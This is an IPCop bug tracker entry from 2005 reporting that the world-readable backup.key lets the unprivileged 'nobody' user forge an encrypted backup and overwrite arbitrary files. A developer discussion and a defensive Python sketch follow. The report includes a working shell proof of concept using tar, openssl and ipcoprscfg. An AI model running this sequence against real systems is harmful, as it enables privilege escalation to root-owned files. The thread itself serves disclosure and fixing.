
#480 user "nobody" can write arbitrary files

Status: closed-fixed
Owner: nobody
Priority: 5
Updated: 2005-11-05
Created: 2005-10-31
Private: No

The user "nobody" can (over)write arbitrary files by
creating fake backups and restoring them.

Cause:
The key used to encrypt the backup file is world-readable:

# ls -al /var/ipcop/backup/
-rw-r--r-- 1 root root 74 2005-02-05 20:30 backup.key

POC:

$ id
uid=99(nobody) gid=99(nobody) groups=99(nobody)
$ cd /tmp
$ mkdir etc
$ echo hacked > etc/hacked
$ tar cvfz backup.tgz etc/
etc/
etc/hacked
$ /usr/bin/openssl des3 -e -salt -in backup.tgz -out backup.dat -kfile /var/ipcop/backup/backup.key
$ cp backup.dat /home/httpd/html/backup/ipcop.dat
$ ls -al /etc/hacked
ls: /etc/hacked: No such file or directory
$ /usr/local/bin/ipcoprscfg --hardware
$ ls -al /etc/hacked
-rw-r--r-- 1 nobody nobody 7 2005-10-07 00:05 /etc/hacked

Bingo.

Note: I assumed that I have a shell as user nobody, for
example by exploiting a vulnerable service.
To get this I entered a valid shell for nobody in
/etc/passwd and did a "su - nobody".

FIX: Change access rights on /var/ipcop/backup/backup.key

Discussion

  • Franck Bourdonnec


    OK, backup.key is now '400' protected.

    But I would like to know why we bother with two kinds of
    sets: encrypted and not encrypted....

  • Franck Bourdonnec

    • status: open --> closed-fixed
  • Robert Kerr

    Robert Kerr - 2005-11-01


    Maybe you shouldn't close the bug if you ask a question? :p

    Encrypted backups can only be restored on the IPCop that
    made them (as it has the key). Unencrypted backups can only
    be restored on an IPCop that has never made a web backup
    (one that has no key). The idea being that if you have to
    rebuild your IPCop you can still get a backup onto it.

    Trouble is unencrypted web backups totally break our security
    model. I can't see any way to do unencrypted web backup and
    restore without allowing nobody -> root privilege
    escalation. I'm not actually convinced the encrypted
    backups are any better - without a signature on them it's
    still possible an attacker could manipulate an existing backup.

    I know gilles has been making some changes here, but I'm not
    sure they go anywhere near far enough.

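The two defensive checks raised in this thread (the '400' permission fix on backup.key, and Robert Kerr's point that an unsigned backup can still be manipulated by anyone who can write the upload directory) as an added example of what a root-side restore tool could verify before extracting anything. This is illustration code written for this page, not IPCop's ipcoprscfg; the key, backup and tag files are constructed in a temp directory and the HMAC tag format is an assumption.

```python
import hashlib
import hmac
import os
import tempfile

# Constructed fixtures stand in for /var/ipcop/backup/backup.key and the
# uploaded /home/httpd/html/backup/ipcop.dat from the report (hypothetical).

def key_is_private(key_path):
    """The '400' fix from the discussion: owner-only, no group/other bits."""
    st = os.stat(key_path)
    return st.st_uid == os.getuid() and (st.st_mode & 0o077) == 0

def backup_tag(key, ciphertext):
    """Authentication tag over the encrypted backup, keyed with backup.key.
    Only meaningful when the key really is private, hence the check above."""
    return hmac.new(key, ciphertext, hashlib.sha256).hexdigest()

def verify_before_restore(key_path, backup_path, tag_path):
    """Return (ok, reason). A restore tool running as root would refuse to
    untar the backup unless both checks pass."""
    if not key_is_private(key_path):
        return False, "backup.key readable by other users; refusing restore"
    with open(key_path, "rb") as f:
        key = f.read()
    with open(backup_path, "rb") as f:
        data = f.read()
    with open(tag_path, "r") as f:
        tag = f.read().strip()
    if not hmac.compare_digest(backup_tag(key, data), tag):
        return False, "tag mismatch: backup was not produced with this key"
    return True, "ok"

def make_fixture(key_mode, tamper=False):
    """Build key, encrypted backup (constructed bytes) and tag in a temp dir."""
    d = tempfile.mkdtemp()
    key_path = os.path.join(d, "backup.key")
    backup_path = os.path.join(d, "ipcop.dat")
    tag_path = backup_path + ".tag"
    key = os.urandom(32)
    data = b"Salted__" + os.urandom(64)  # stands in for the openssl output
    with open(key_path, "wb") as f:
        f.write(key)
    os.chmod(key_path, key_mode)
    with open(tag_path, "w") as f:
        f.write(backup_tag(key, data))
    if tamper:  # an unprivileged user replaces the file after it was tagged
        data = b"Salted__" + os.urandom(64)
    with open(backup_path, "wb") as f:
        f.write(data)
    return key_path, backup_path, tag_path
```

With a 0644 key the restore is refused outright; with a 0400 key it succeeds only when the tag still matches the file.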
  • Robert Kerr

    Robert Kerr - 2005-11-01
    • status: closed-fixed --> open-fixed
  • Gilles Espinasse

    • status: open-fixed --> closed-fixed
  • Gilles Espinasse


    Now that backup.key access is restricted to root, this point
    should be considered closed.
    Unencrypted backup is covered by another SF bug report.
